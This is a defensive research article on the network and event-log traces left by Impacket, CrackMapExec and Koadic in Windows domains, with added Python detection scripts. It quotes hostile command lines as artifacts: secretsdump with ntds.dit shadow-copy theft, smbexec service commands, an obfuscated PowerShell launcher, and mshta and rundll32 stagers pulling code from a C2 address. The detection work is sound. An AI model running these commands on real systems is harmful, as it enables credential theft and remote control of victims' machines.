How to detect attacks on Windows infrastructure: studying the hacker toolkit

The number of attacks on the corporate sector grows every year: in 2017, for example, 13% more unique incidents were recorded than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period. Among them are those where the Windows operating system is the main working tool. In 2017-2018, APT Dragonfly, APT28 and APT MuddyWater attacked government and military organizations in Europe, North America and Saudi Arabia, and used three tools for this: Impacket, CrackMapExec and Koadic. Their source code is open and available on GitHub.

It is worth noting that these tools are not used for initial penetration, but for developing an attack inside the infrastructure. Attackers use them at various stages of an attack after the perimeter has been breached. This, by the way, is hard to detect, and often only with the help of technologies that identify traces of compromise in network traffic, or tools that make it possible to detect the attacker's active actions after they have penetrated the infrastructure. The tools provide a variety of functions, from transferring files to interacting with the registry and executing commands on a remote machine. We conducted a study of these tools to determine their network activity.

What we needed to do:

  • Understand how the hacking tools work. Find out what attackers need in order to exploit them and which technologies they can use.
  • Find what information security tools miss in the first stages of an attack. The reconnaissance stage may be skipped, either because the attacker is an insider, or because the attacker is exploiting a hole in the infrastructure that was not previously known. It becomes possible to restore the entire chain of their actions, hence the desire to detect further movement.
  • Eliminate false positives from intrusion detection tools. We must not forget that when certain actions are detected on the basis of reconnaissance alone, frequent errors are possible. Usually there are enough ways in an infrastructure, indistinguishable from legitimate ones at first glance, to obtain any information.

What do these tools give attackers? If it is Impacket, attackers get a large library of modules that can be used at different stages of an attack after the perimeter has been breached. Many tools use Impacket modules internally, for example Metasploit. It has dcomexec and wmiexec for remote command execution and secretsdump for obtaining accounts from memory, all of which are added from Impacket. As a result, correct detection of the activity of such a library will also ensure detection of its derivatives.

It is no coincidence that the creators wrote "Powered by Impacket" about CrackMapExec (or simply CME). In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, running the Meterpreter or Empire agent for remote execution, and Bloodhound on board.

The third tool we chose was Koadic. It is quite new; it was presented at the international hacker conference DEFCON 25 in 2017 and stands out for its non-standard approach: it works via HTTP, Java Script and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. The creators call it COM Command & Control, or C3.

IMPACKET

Impacket's functionality is very broad, from reconnaissance inside AD and collecting data from internal MS SQL servers to techniques for obtaining credentials: this is the SMB relay attack, and obtaining the ntds.dit file containing user password hashes from a domain controller. Impacket also executes commands remotely using four different methods: WMI, Windows Scheduler Management Service, DCOM and SMB, and requires credentials to do so.

Secretsdump

Let's look at secretsdump. This is a module that can target both user machines and domain controllers. It can be used to obtain copies of the LSA, SAM, SECURITY and NTDS.dit memory areas, so it can be seen at different stages of an attack. The first step in the module's operation is authentication via SMB, which requires either the user's password or its hash, so that a Pass the Hash attack is performed automatically. Then comes a request to open access to the Service Control Manager (SCM) and to obtain access to the registry via the winreg protocol, through which the attacker finds out the data of the branches of interest and gets the results via SMB.

In Fig. 1 we see how exactly, when using the winreg protocol, access is obtained via a registry key with an LSA. To do this, the DCERPC command with opcode 15 - OpenKey is used.

Fig. 1. Opening a registry key using the winreg protocol

Next, when access to the key is obtained, the values are saved with the SaveKey command with opcode 20. Impacket does this in a very specific way. It saves the values to a file whose name is a string of 8 random characters with .tmp appended. In addition, this file is then uploaded via SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for obtaining a registry key from a remote machine

It turns out that such activity on the network can be detected by requests to certain registry branches using the winreg protocol, by specific names, commands and their order.

This module also leaves traces in the Windows event log, which makes it easy to detect. For example, as a result of executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in the Windows Server 2016 log we will see the following key sequence of events:

1. 4624 - remote logon.
2. 5145 - check of access rights to the winreg remote service.
3. 5145 - check of file access rights in the System32 directory. The file has the random name described above.
4. 4688 - creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like any post-exploitation tool, Impacket has modules for remote command execution. We will focus on smbexec, which provides an interactive command shell on a remote machine. This module also requires authentication via SMB, with either a password or its hash. In Fig. 3 we see an example of how such a tool works; in this case it is a local administrator console.

Fig. 3. Interactive smbexec console

The first step of smbexec after authentication is to open the SCM with the OpenSCManagerW (15) command. The request is notable: the MachineName field is DUMMY.

Fig. 4. Request to open the Service Control Manager

Next, the service is created with the CreateServiceW (12) command. In the case of smbexec, we can see the same command construction logic every time. In Fig. 5, green marks the parts of the command that cannot be changed, and yellow marks what the attacker can change. It is easy to see that the name of the executable file, its directory and the output file can be changed, but the rest is much harder to change without touching the logic of the Impacket module.

Fig. 5. Request to create a service using the Service Control Manager

Smbexec also leaves obvious traces in the Windows event log. In the Windows Server 2016 log, for an interactive command shell with the ipconfig command, we will see the following key sequence of events.

1. 4697 - installation of a service on the victim's machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of a cmd.exe process with the arguments from item 1.
3. 5145 - check of access rights to the __output file in the C$ share.
4. 4697 - installation of a service on the victim's machine:

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a cmd.exe process with the arguments from item 4.
6. 5145 - check of access rights to the __output file in the C$ share.

Impacket is the basis for the development of attack tools. It supports all the protocols in a Windows infrastructure and at the same time has its own characteristic features: the specific winreg requests, the use of the SCM API with its characteristic command formation, the file name format, and the SMB share SYSTEM32.
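The two event sequences above (secretsdump and smbexec) can be turned into host-log detection logic. The following is an added example, not code from the article or from Impacket: it tags individual Windows Security events by the artifacts the article names (the winreg pipe access, the 8-letter .tmp hive copy in System32, the vssadmin commands wrapped in the execute.bat pattern, and the smbexec service whose binary path redirects to \\127.0.0.1\C$\__output) and then correlates the tags per host and account. The event records are constructed for the example; the field names (id, host, user, share, target, cmdline, service_file) and the ADMIN$ share for the .tmp file are assumptions about how an EVTX parser would present the events, not values taken from the article.

```python
import re
from collections import defaultdict

# Constructed sample events (not real logs). Field names are an assumption
# about the output of an EVTX parser; the command lines restate the shapes
# shown in the article, with a benign vssadmin call added for contrast.
SAMPLE_EVENTS = [
    {"id": 4624, "host": "DC", "user": r"contoso\Administrator", "logon_type": 3},
    {"id": 5145, "host": "DC", "user": r"contoso\Administrator",
     "share": r"\\*\IPC$", "target": "winreg"},
    {"id": 5145, "host": "DC", "user": r"contoso\Administrator",
     "share": r"\\*\ADMIN$", "target": r"System32\rmumAfcn.tmp"},
    {"id": 4688, "host": "DC", "user": r"contoso\Administrator",
     "cmdline": r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'},
    {"id": 4697, "host": "WS01", "user": r"contoso\Administrator",
     "service_file": r'%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'},
    # A backup operator listing shadow copies directly: no execute.bat wrapper, should stay quiet.
    {"id": 4688, "host": "WS01", "user": "svc_backup",
     "cmdline": r"C:\Windows\system32\cmd.exe /c vssadmin list shadows"},
]

# Artifacts from the article, expressed as patterns.
TMP_HIVE_RE = re.compile(r"(?i)system32\\[a-z]{8}\.tmp$")          # 8 random letters + .tmp
EXEC_BAT_RE = re.compile(r"(?i)%TEMP%\\execute\.bat")              # Impacket's batch wrapper
VSSADMIN_RE = re.compile(r"(?i)vssadmin\s+(list|create|delete)\s+shadows?")
SMBEXEC_RE = re.compile(
    r"(?i)^%COMSPEC% /Q /c echo .+\^> \\\\127\.0\.0\.1\\C\$\\__output 2\^>\^&1 > %TEMP%\\execute\.bat"
)


def classify(ev):
    """Return the artifact tags one event carries, or [] if nothing matches."""
    tags = []
    if ev["id"] == 5145:
        target = ev.get("target", "")
        if target.lower() == "winreg":
            tags.append("winreg_pipe")
        elif TMP_HIVE_RE.search(target):
            tags.append("secretsdump_tmp_hive")
    elif ev["id"] == 4688:
        cmd = ev.get("cmdline", "")
        if EXEC_BAT_RE.search(cmd) and VSSADMIN_RE.search(cmd):
            tags.append("secretsdump_vss")
        elif EXEC_BAT_RE.search(cmd):
            tags.append("impacket_execute_bat")
    elif ev["id"] == 4697:
        if SMBEXEC_RE.search(ev.get("service_file", "")):
            tags.append("smbexec_service")
    return tags


def detect(events):
    """Correlate tags per (host, account) and name the Impacket module they indicate."""
    per_actor = defaultdict(set)
    for ev in events:
        for tag in classify(ev):
            per_actor[(ev["host"], ev["user"])].add(tag)
    verdicts = {}
    for actor, tags in per_actor.items():
        if {"winreg_pipe", "secretsdump_tmp_hive"} <= tags or "secretsdump_vss" in tags:
            verdicts[actor] = "impacket secretsdump"
        elif "smbexec_service" in tags:
            verdicts[actor] = "impacket smbexec"
        elif tags:
            verdicts[actor] = "impacket-style execute.bat wrapper"
    return verdicts


if __name__ == "__main__":
    for actor, verdict in detect(SAMPLE_EVENTS).items():
        print(f"{actor[0]} / {actor[1]}: {verdict}")
```

The correlation key is deliberately (host, account) rather than a single event: a lone vssadmin call or a lone 5145 on winreg is normal administration, while the combination with the random .tmp name and the execute.bat wrapper is what the article identifies as the module's signature.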

CRACKMAPEXEC

The CME tool is primarily designed to automate the routine actions an attacker performs in order to advance inside the network. It makes it possible to work with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound, as a standalone tool, allows advanced reconnaissance inside the network. It collects data about users, machines, groups and sessions and is delivered as a PowerShell script or a binary file. The LDAP or SMB protocols are used to collect the information. The CME integration module allows Bloodhound to be downloaded to the victim's machine, run, and the collected data retrieved after execution, thereby automating the actions in the system and making them less noticeable. The Bloodhound graphical shell presents the collected data in the form of graphs, which makes it possible to find the shortest path from the attacker's machine to the domain administrator.

Fig. 6. Bloodhound interface

To run on the victim's machine, the module creates a task using ATSVC and SMB. ATSVC is an interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: it is a cmd.exe command invocation with obfuscated code as the arguments, in XML format.

Fig. 7. Creating a task via CME

After the task has been queued for execution, the victim's machine starts Bloodhound itself, and this can be seen in the traffic. The module is characterized by LDAP queries for the standard groups, the list of all machines and users in the domain, and by obtaining information about active user sessions via the SRVSVC NetSessEnum request.

Fig. 8. Obtaining the list of active sessions via SMB

In addition, the launch of Bloodhound on the victim's machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and the process name "C:\Windows\System32\cmd.exe". What is notable about it are the command line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
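The two obfuscation tricks in that command line are mechanical and an analyst can undo them during triage. The following is an added example, not code from the article or from CrackMapExec: it resolves the $env:COMSPEC character-index trick (indexes 4, 26 and 25 of "C:\Windows\system32\cmd.exe" spell "iex") and decodes the [char[]](...) list back into text. The sample command line is constructed for the example; the article's own array is elided with "…", so the numbers after 101 here are an assumed continuation that decodes to "[Net.ServicePointManager]", not the values CME actually sends.

```python
import re

# Default %COMSPEC% on Windows; the obfuscation indexes into this string.
COMSPEC = r"C:\Windows\system32\cmd.exe"

# Constructed sample; the character list continues the article's "91, 78, 101, 116, 46, 83, 101"
# with an assumed tail, so the decoded text is illustrative only.
SAMPLE_CMDLINE = r'''cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 ,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93)-jOIN'' ) "'''

# PowerShell is case-insensitive, and so is the random casing the tool applies.
ENV_INDEX_RE = re.compile(r"\$env:comspec\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)
CHAR_ARRAY_RE = re.compile(r"\[char\[\]\]\(([\d,\s]+)\)\s*-join\s*''", re.IGNORECASE)


def _numbers(text):
    """'91 , 78, 101' -> [91, 78, 101]"""
    return [int(n) for n in re.sub(r"\s", "", text).split(",") if n]


def resolve_comspec_index(index_list, comspec=COMSPEC):
    """Pick characters of %COMSPEC% by index: '4,26,25' -> 'iex'."""
    return "".join(comspec[i] for i in _numbers(index_list))


def decode_char_array(number_list):
    """Turn the [char[]](...) code list back into text."""
    return "".join(chr(n) for n in _numbers(number_list))


def deobfuscate(cmdline):
    """Return (invoked_cmdlet, decoded_payload), or (None, None) if the line is not in this shape."""
    m_env = ENV_INDEX_RE.search(cmdline)
    m_chr = CHAR_ARRAY_RE.search(cmdline)
    if not (m_env and m_chr):
        return None, None
    return resolve_comspec_index(m_env.group(1)), decode_char_array(m_chr.group(1))


def is_hidden_iex(cmdline):
    """True when the command line resolves to Invoke-Expression on a decoded string."""
    cmdlet, _ = deobfuscate(cmdline)
    return cmdlet is not None and cmdlet.lower() == "iex"


if __name__ == "__main__":
    cmdlet, payload = deobfuscate(SAMPLE_CMDLINE)
    print(f"cmdlet={cmdlet!r} payload starts with {payload!r}")
```

Whether the decoded text is "[Net.ServicePointManager]" or something else, the detection-relevant fact is the shape: a character-indexed `$env:COMSPEC` producing `iex` followed by a numeric char array is not something administrators type, so the resolved cmdlet alone is a strong 4688 indicator.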

Enum_avproducts

The enum_avproducts module is very interesting from the point of view of its functionality and implementation. WMI allows the WQL query language to be used to retrieve data from various Windows objects, and this is exactly what this CME module uses. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim's machine. To obtain the necessary data, the module connects to the root\SecurityCenter2 namespace, then forms a WQL query and receives a response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

Quite often, WMI auditing (Trace WMI-Activity), whose events contain useful information about WQL queries, may be turned off. But if it is enabled, then when enum_avproducts runs, an event with ID 11 will be saved. It will contain the name of the user who sent the request and the name in the root\SecurityCenter2 namespace.
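The WMI-Activity event is a "key = value;" message, so the WQL query and its namespace can be pulled out and checked against the classes the module targets. The following is an added example, not code from the article or from CME; the event message is constructed in the shape of a WMI-Activity trace record, and its field names (Operation, User, ClientMachine, NamespaceName) are an assumption for the example rather than values copied from a real log.

```python
import re

# Constructed sample in the shape of a WMI-Activity trace event 11 message.
# Field names are an assumption for this example, not taken from a real log.
SAMPLE_EVENT_11 = (
    "GroupOperationId = 65211; OperationId = 65212; "
    "Operation = Start IWbemServices::ExecQuery - root\\SecurityCenter2 : SELECT * FROM AntiVirusProduct; "
    "ClientMachine = WS01; User = CONTOSO\\j.doe; ClientProcessId = 4312; "
    "NamespaceName = \\\\.\\root\\SecurityCenter2"
)

# Benign contrast: an inventory query against a different namespace.
SAMPLE_BENIGN = (
    "GroupOperationId = 70001; OperationId = 70002; "
    "Operation = Start IWbemServices::ExecQuery - root\\cimv2 : SELECT Name FROM Win32_Service; "
    "ClientMachine = WS01; User = CONTOSO\\svc_inventory; ClientProcessId = 880; "
    "NamespaceName = \\\\.\\root\\cimv2"
)

FIELD_RE = re.compile(r"(\w+) = (.*?)(?:; |$)")
EXEC_QUERY_RE = re.compile(r"Start IWbemServices::ExecQuery - (?P<ns>\S+) : (?P<query>.+)", re.IGNORECASE)
FROM_RE = re.compile(r"\bFROM\s+(\w+)", re.IGNORECASE)

# The classes the article says enum_avproducts asks for.
AV_CLASSES = {"antivirusproduct", "antispywareproduct"}


def parse_fields(message):
    """Split a 'key = value; key = value' message into a dict."""
    return dict(FIELD_RE.findall(message))


def analyze_event_11(message):
    """Extract namespace, queried classes and requester; flag SecurityCenter2 AV enumeration."""
    fields = parse_fields(message)
    m = EXEC_QUERY_RE.search(fields.get("Operation", ""))
    if not m:
        return None
    classes = sorted(set(FROM_RE.findall(m.group("query"))))
    in_security_center = m.group("ns").lower().endswith("securitycenter2")
    asks_for_av = any(c.lower() in AV_CLASSES for c in classes)
    return {
        "user": fields.get("User"),
        "client": fields.get("ClientMachine"),
        "namespace": m.group("ns"),
        "classes": classes,
        "av_enumeration": in_security_center and asks_for_av,
    }


if __name__ == "__main__":
    for msg in (SAMPLE_EVENT_11, SAMPLE_BENIGN):
        print(analyze_event_11(msg))
```

Because the Windows Security Center itself and some management agents read these classes, the av_enumeration flag is best treated as a pivot: the user and client fields tell you whether the requester is a known agent or an interactive account that has no business asking.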

Each CME module has its own artifacts, whether these are specific WQL queries, the creation of a certain type of task in the Task Scheduler with obfuscation, or the Bloodhound-specific activity over LDAP and SMB.

KOADIC

A distinctive feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this sense it follows the living off the land trend: that is, it has no external dependencies and uses standard Windows tools. It is a Command and Control (CnC) tool, because after infection an "implant" is installed on the machine that allows it to be controlled. Such a machine, in Koadic terminology, is called a "zombie". If the privileges on the victim's side are insufficient for full operation, Koadic can elevate them using User Account Control bypass (UAC bypass) techniques.

Fig. 10. Koadic shell

The victim must initiate communication with the Command & Control server. To do this, it has to access a pre-prepared URI and receive the main Koadic body using one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Initiating a session with the CnC server

From the WS variable in the response it is clear that execution takes place via WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE variables contain the key information about the parameters of the current session. This is the first request-response pair in the HTTP connection with the CnC server. Subsequent requests relate directly to the functionality of the modules (implants) that are called. All Koadic modules work only with an active session with the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways of launching it. Below is the request-response pair for loading the Mimikatz implant.

Fig. 12. Delivering Mimikatz to Koadic

You can see how the format of the URI in the request has changed. It now contains a value for the csrf variable, which is responsible for the selected module. Do not pay attention to its name; we all know that CSRF is usually understood as something else. The response is the same main Koadic body, to which the code related to Mimikatz has been added. It is quite large, so let's look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and the arguments for launching Mimikatz. The result of execution is sent over the network in clear text.

Fig. 13. The result of running Mimikatz on a remote machine

Exec_cmd

Koadic has modules that can execute commands remotely. Here we see the same URI generation method and the familiar sid and csrf parameters. In the case of the exec_cmd module, code is added to the body that can execute shell commands. Below is such code in the HTTP response of the CnC server.

Fig. 14. Injected exec_cmd code

The GAWTUUGCFI variable with the familiar WS attribute is required for code execution. With its help, the implant calls the shell, handling two branches of the code: shell.exec, which returns the output data stream, and shell.run, which returns nothing.

Koadic is not a typical tool, but it has its own artifacts by which it can be found in legitimate traffic:

  • the special formation of HTTP requests,
  • the use of the winHttpRequests API,
  • the creation of a WScript.Shell object via ActiveXObject,
  • the large executable body.

The initial connection is initiated by the stager, so its activity can be detected through Windows events. For mshta, this is event 4688, indicating the creation of a process with the following start attributes:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, you can see other 4688 events with attributes that characterize it precisely:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
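The 4688 lines above fall into three shapes that a process-creation rule can tell apart: the mshta stager fetching a URL, rundll32 re-launching the body with sid and csrf parameters and the mshtml,RunHTMLApplication export, and the exec_cmd wrapper that redirects a command into a GUID-named .txt under Temp. The following is an added example, not code from the article or from Koadic: it classifies a list of 4688 command lines, extracts the session ids so that related events can be grouped, and leaves benign mshta and rundll32 launches alone. The sample lines restate the article's own examples (hosts, ports, sid and csrf values are the article's); the two benign lines are constructed for contrast.

```python
import re

# Constructed sample of 4688 command lines: the first five restate the shapes
# the article shows (its own URLs, sid and csrf values); the last two are benign
# launches added for contrast.
SAMPLE_4688 = [
    r"C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6",
    r"rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication",
    r"rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1',
    r"C:\Windows\system32\mshta.exe C:\Temp\report.hta",          # local HTA, no URL
    r"rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl",        # ordinary control panel launch
]

# Stager: mshta pulling the body from an HTTP(S) URL.
STAGER_RE = re.compile(r"(?i)mshta\.exe\s+(https?://\S+)")
# Implant re-launch: rundll32 with sid/csrf in the URL and the mshtml export.
IMPLANT_RE = re.compile(
    r"(?i)rundll32\.exe\s+(https?://[^\s?]+)\?sid=([0-9a-f]+);\s*csrf=([0-9a-f]*);.*mshtml,RunHTMLApplication"
)
# exec_cmd: chcp 437, the command, and output redirected to a GUID-named .txt in Temp.
EXEC_CMD_RE = re.compile(
    r'(?i)cmd\.exe"?\s+/q\s+/c\s+chcp 437 & (.+?) 1> (\S+\\Temp\\[0-9a-f-]{36}\.txt) 2>&1'
)


def classify_4688(cmdline):
    """Return a finding dict for a Koadic-shaped command line, else None."""
    m = STAGER_RE.search(cmdline)
    if m:
        return {"stage": "stager", "url": m.group(1)}
    m = IMPLANT_RE.search(cmdline)
    if m:
        return {"stage": "implant", "url": m.group(1), "sid": m.group(2), "csrf": m.group(3) or None}
    m = EXEC_CMD_RE.search(cmdline)
    if m:
        return {"stage": "exec_cmd", "command": m.group(1), "output_file": m.group(2)}
    return None


def analyze(cmdlines):
    """Classify every line and drop the ones that match nothing."""
    return [f for f in (classify_4688(c) for c in cmdlines) if f]


def session_ids(findings):
    """Collect the Koadic session ids seen in implant launches, for grouping events."""
    return {f["sid"] for f in findings if f["stage"] == "implant"}


if __name__ == "__main__":
    for finding in analyze(SAMPLE_4688):
        print(finding)
```

The sid value is the natural join key: the stager has none yet, but every later implant launch carries it, so once the first implant event is seen the whole 4688 stream for that session can be pulled together and the exec_cmd lines attributed to it.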

Conclusion

Living off the land is gaining popularity among criminals. They use the tools and mechanisms built into Windows for their own purposes. We are seeing the popular tools Koadic, CrackMapExec and Impacket appear more and more often in APT reports precisely for this reason. The number of forks of these tools on GitHub is also growing, and new ones are appearing (there are already more than a thousand of them). The trend is gaining popularity because of its simplicity: attackers do not need third-party tools; these are already on the victims' machines and help them bypass security measures. We are focused on studying network communication: each of the tools described above leaves its own traces in network traffic; a detailed study of them allowed us to teach our product PT Network Attack Discovery to detect them, which in turn helps to investigate the entire chain of cyber incidents involving them.

Authors:

  • Anton Tyurin, Head of the Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: www.habr.com
